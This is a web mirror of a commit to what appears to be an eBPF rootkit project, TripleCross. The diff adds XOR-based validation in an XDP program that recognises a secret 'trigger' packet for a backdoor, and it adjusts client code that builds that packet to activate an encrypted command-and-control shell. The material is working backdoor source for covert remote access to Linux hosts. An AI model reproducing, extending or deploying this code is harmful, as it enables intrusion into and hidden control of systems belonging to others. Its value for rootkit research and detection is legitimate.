admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Completed checks for V1 trigger

Browse Source
This commit is contained in:
h3xduck
2022-05-04 08:54:21 -04:00
parent 073a911f74
commit ead4a4ca68
8 changed files with 1685 additions and 1567 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

3206
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

2
src/client/client.c
View File

@@ -221,7 +221,7 @@ void activate_command_control_shell_encrypted(char* argv){
strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii] ^ key2[ii];
result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
}
strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

BIN
src/client/client.o
View File

Binary file not shown.

BIN
src/client/injector
View File

Binary file not shown.

42
src/ebpf/include/xdp/backdoor.h
View File

@@ -9,10 +9,13 @@
static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char section3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result1[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
char result3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
//Undoing the trigger secret packet to check it is the one expected
@@ -25,16 +28,39 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
__builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result[ii] = section[ii] ^ section2[ii];
if(result[ii]!=key1[ii]){
bpf_printk("FAIL\n");
}
}
bpf_printk("Finished V1 check\n");
result1[ii] = section[ii] ^ section2[ii];
if(result1[ii]!=key1[ii]){
bpf_printk("FAIL CHECK 1\n");
return XDP_PASS;
}
}
//S2 XOR K2
__builtin_memcpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result2[ii] = section[ii] ^ section2[ii];
if(result2[ii]!=key2[ii]){
bpf_printk("FAIL CHECK 2\n");
return XDP_PASS;
}
}
//S1 XOR K1 XOR S2 XOR K2 XOR K3
__builtin_memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=key3[ii]){
bpf_printk("FAIL CHECK 3\n");
return XDP_PASS;
}
}
//If we reach this point then we received trigger packet
bpf_printk("Finished backdoor V1 check\n");
return XDP_DROP;

4
src/ebpf/kit.bpf.c
View File

@@ -55,8 +55,8 @@ SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx){
//bpf_printk("BPF triggered\n");
void *data_end = (void *)(__u32)ctx->data_end;
void *data = (void *)(__u32)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data;
unsigned int payload_size;
struct ethhdr *eth = data;